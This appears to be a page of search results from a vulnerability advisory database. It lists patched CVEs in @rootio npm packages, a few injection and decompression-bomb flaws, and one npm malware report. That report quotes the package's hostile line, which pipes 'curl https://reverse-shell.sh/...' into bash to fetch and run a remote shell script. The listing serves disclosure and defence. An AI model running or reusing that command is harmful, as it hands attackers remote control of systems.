142247 matches found
ROOT-APP-NPM-CVE-2026-45740 CVE-2026-45740 in @rootio/protobufjs - Patched by Root
Root has patched CVE-2026-45740 in the @rootio/protobufjs package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-24118 CVE-2026-24118 in @rootio/vm2 - Patched by Root
Root has patched CVE-2026-24118 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44003 CVE-2026-44003 in @rootio/vm2 - Patched by Root
Root has patched CVE-2026-44003 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-26956 CVE-2026-26956 in @rootio/vm2 - Patched by Root
Root has patched CVE-2026-26956 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-AIKIDO-2026-10844 AIKIDO-2026-10844 in @rootio/vm2 - Patched by Root
Root has patched AIKIDO-2026-10844 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-AIKIDO-2026-10841 AIKIDO-2026-10841 in @rootio/vm2 - Patched by Root
Root has patched AIKIDO-2026-10841 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44009 CVE-2026-44009 in @rootio/vm2 - Patched by Root
Root has patched CVE-2026-44009 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-AIKIDO-2026-10689 AIKIDO-2026-10689 in @rootio/vm2 - Patched by Root
Root has patched AIKIDO-2026-10689 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...
CVE-2026-11386
Summary: CVE-2026-11386 affects Canonical ubuntu-pro-client (formerly ubuntu-advantage-tools). The package builds APT source files by interpolating contract server data from directives.suites[] and directives.aptURL without escaping or validation, allowing newline characters to inject attacker-co...
ROOT-APP-NPM-CVE-2026-54288 CVE-2026-54288 in @rootio/hono - Patched by Root
Root has patched CVE-2026-54288 in the @rootio/hono package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-47675 CVE-2026-47675 in @rootio/hono - Patched by Root
Root has patched CVE-2026-47675 in the @rootio/hono package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-56761 CVE-2026-56761 in @rootio/hono - Patched by Root
Root has patched CVE-2026-56761 in the @rootio/hono package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-54314 CVE-2026-54314 in @rootio/n8n - Patched by Root
Root has patched CVE-2026-54314 in the @rootio/n8n package for Root:npm. Multiple fixed versions available...
MAL-2026-10691 Malicious code in internallib_v907 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...
EUVD-2026-44768
OS command injection in the npm package loading component in AWS jsii-diff before 1.131.0 might allow context-dependent attackers to execute arbitrary commands via crafted package specifiers passed to the npm: source argument. To mitigate this issue, users should upgrade to jsii-diff v1.131.0 or...
CVE-2026-15895 OS command injection in jsii-diff in AWS jsii
OS command injection in the npm package loading component in AWS jsii-diff before 1.131.0 might allow context-dependent attackers to execute arbitrary commands via crafted package specifiers passed to the npm: source argument. To mitigate this issue, users should upgrade to jsii-diff v1.131.0 or...
ROOT-APP-NPM-CVE-2026-27980 CVE-2026-27980 in @rootio/next - Patched by Root
Root has patched CVE-2026-27980 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-29057 CVE-2026-29057 in @rootio/next - Patched by Root
Root has patched CVE-2026-29057 in the @rootio/next package for Root:npm. Multiple fixed versions available...
CVE-2026-61449 Grav before 2.0.2 Decompression Bomb via Forged ZIP Size
Grav 2.0.1 contains a decompression-bomb size-cap bypass in ZipArchiver and GPM\Installer. The size bound introduced in 2.0.1 sums the uncompressed size declared in each entry's ZIP central-directory header ZipArchive::statIndex'size' and rejects archives exceeding...
ROOT-APP-NPM-GHSA-VVJJ-XCJG-GR5G GHSA-vvjj-xcjg-gr5g in @rootio/nodemailer - Patched by Root
Root has patched GHSA-vvjj-xcjg-gr5g in the @rootio/nodemailer package for Root:npm. Multiple fixed versions available...